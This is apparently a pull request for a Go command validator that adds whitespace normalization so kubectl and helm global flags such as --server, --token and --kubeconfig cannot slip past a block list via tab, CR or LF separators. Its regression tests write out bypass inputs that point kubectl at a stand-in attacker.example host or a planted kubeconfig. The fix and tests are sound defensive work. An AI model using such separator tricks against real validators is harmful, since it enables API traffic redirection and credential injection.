### PR TITLE
fix(security): normalize whitespace before scanning blocked global flags

### DIFF
--- a/pkg/security/validator.go
+++ b/pkg/security/validator.go
@@ -14,6 +14,11 @@ const (
 )
 
 var (
+	// globalFlagWhitespace matches any run of shell whitespace recognized by
+	// shlex (space, tab, carriage return, line feed) so we can collapse it to
+	// a single space before scanning for blocked global flags.
+	globalFlagWhitespace = regexp.MustCompile(`[ \t\r\n]+`)
+
 	// KubectlBlockedGlobalFlags defines kubectl global flags that can redirect API traffic or inject credentials.
 	// These are blocked at all access levels because they bypass the intent of access-level restrictions
 	// by allowing traffic redirection and credential exfiltration.
@@ -192,7 +197,12 @@ func (v *Validator) validateGlobalFlags(command, commandType string) error {
 		return nil
 	}
 
-	cmdLower := strings.ToLower(command)
+	// Normalize all shell whitespace (tab/CR/LF/space) to a single space so the
+	// substring scan matches the executor's shlex tokenization, which treats
+	// " \t\r\n" as argument separators. Without this, payloads like
+	// "--server\thttps://attacker" bypass the literal "--server " check while
+	// still reaching exec as the flag/value pair kubectl honors.
+	cmdLower := globalFlagWhitespace.ReplaceAllString(strings.ToLower(command), " ")
 	for _, flag := range blockedFlags {
 		if strings.Contains(cmdLower, strings.ToLower(flag)) {
 			return &ValidationError{Message: "Error: Global flag '" + flag + "' is not allowed; it can redirect API traffic or inject credentials"}

--- a/pkg/security/validator_test.go
+++ b/pkg/security/validator_test.go
@@ -280,6 +280,17 @@ func TestValidateGlobalFlags(t *testing.T) {
 		{"helm -n flag allowed", "helm list -n default", CommandTypeHelm, false},
 		// cilium/hubble not affected
 		{"cilium with --server not blocked", "cilium status --server=evil", CommandTypeCilium, false},
+		// Whitespace bypass regression — shlex splits on tab/CR/LF in addition
+		// to space, so non-space separators must not slip past the substring scan.
+		{"kubectl --server <tab> blocked", "kubectl get pods --server\thttps://attacker.example:8443", CommandTypeKubectl, true},
+		{"kubectl --server <newline> blocked", "kubectl get pods --server\nhttps://attacker.example:8443", CommandTypeKubectl, true},
+		{"kubectl --server <cr> blocked", "kubectl get pods --server\rhttps://attacker.example:8443", CommandTypeKubectl, true},
+		{"kubectl --token <tab> blocked", "kubectl get pods --token\tabc123", CommandTypeKubectl, true},
+		{"kubectl --token <newline> blocked", "kubectl get pods --token\nabc123", CommandTypeKubectl, true},
+		{"kubectl --kubeconfig <tab> blocked", "kubectl get pods --kubeconfig\t/tmp/evil", CommandTypeKubectl, true},
+		{"kubectl --as <tab> blocked", "kubectl get pods --as\tadmin", CommandTypeKubectl, true},
+		{"helm --kube-apiserver <tab> blocked", "helm list --kube-apiserver\thttps://attacker.example:8443", CommandTypeHelm, true},
+		{"helm --kubeconfig <newline> blocked", "helm list --kubeconfig\n/tmp/evil", CommandTypeHelm, true},
 	}
 
 	for _, tc := range tests {


### PR DESCRIPTION
## Summary
- \`validateGlobalFlags\` searched for literal \`--server \` / \`--server=\` etc. with a single ASCII space, but the executor parses the same string with \`shlex.Split\`, which also splits on tab/CR/LF. Payloads like \`--server<TAB>https://attacker\` or \`--server<LF>https://attacker\` passed validation and reached \`exec\` as the (\`--server\`, URL) argv pair kubectl honors — defeating the documented boundary for traffic-redirection and credential-injection flags (the full \`KubectlBlockedGlobalFlags\` / \`HelmBlockedGlobalFlags\` sets, including \`--kubeconfig\`, \`--token\`, \`--as*\`).
- Collapse runs of shell whitespace (\`\" \\t\\r\\n\"\`) to a single space before the substring scan so the validator's grammar matches the executor's tokenizer.


## Test plan
- [x] \`go test ./pkg/security/...\` (new regression cases cover tab/CR/LF separators for \`--server\`, \`--token\`, \`--kubeconfig\`, \`--as\`, helm \`--kube-apiserver\`, helm \`--kubeconfig\`)
- [x] \`go build ./...\`